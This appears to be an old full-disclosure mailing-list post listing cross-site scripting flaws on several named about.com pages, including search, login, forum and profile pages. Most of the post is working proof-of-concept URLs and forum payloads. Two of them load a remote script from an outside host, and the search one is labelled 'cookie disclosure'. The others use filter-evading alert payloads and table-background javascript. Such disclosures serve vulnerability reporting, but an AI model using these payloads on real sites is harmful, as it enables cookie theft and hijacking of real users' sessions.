About.com

Homepage:

http://www.about.com


Effected files:

Search input box

fullsearch.htm

shortform.htm

forum.aspx

profile_center.asp

posting in the forum

-----------------------------------


Search input box xss vuln with cookie disclosure:

Works by putting the <script> tags in the input box, or doing url injection. 
There seemsto be no sanatizing user input here. PoC:

http://search.about.com/fullsearch.htm?terms=<script%20src=http://www.youfucktard.com/xs.js></script>


Screenshots:

http://www.youfucktard.com/xsp/about1.jpg

http://www.youfucktard.com/xsp/about2.jpg


-----------------------------------------


Shortform.htm XSS vuln no filter evasion needed:

http://login.about.com/shortform.htm?Error=<SCRIPT%20SRC=http://youfucktard.com/xss.js></SCRIPT>


Screenshots:

http://www.youfucktard.com/xsp/about3.jpg


---------------------------------------------


Forum.aspx xss vuln. Here we have malformed image tags, as well as empty script 
tags:


PoC:

http://forums.about.com/n/pfx/forum.aspx?nav=messages&tsn=<IMG%20"""><SCRIPT></SCRIPT>">1&tid=1456">">"><"">'>'>'><"<IMG%20"""><IMG%20"""><SCRIPT></SCRIPT>"><SCRIPT>alert("XSS")</SCRIPT>">"><"<"<"<"<""><"<"<'<'&webtag=ab-vgstrategies


------------------------------------------------------


Profile_center.asp xss vuln:


http://forums.about.com/dir-app/bbCard/profile_center.asp?webtag=ab-vgstrategies&cType=2&uName=jonne1234";>">"><IMG%20SRC=javascript:alert('XSS')><"<"<"&dMode=0&eBtn=0&uid=1574961808


------------------------------------------------------


Posting in the forum XSS vuln. This time we'll use the allowed tags <table>. 
For PoC try posting this in the forum:


<TABLE><TD BACKGROUND="javascript:alert('XSS')">

<TABLE BACKGROUND="javascript:alert('XSS')">



Screenshots:

http://www.youfucktard.com/xsp/about4.jpg

http://www.youfucktard.com/xsp/about5.jpg

Reply via email to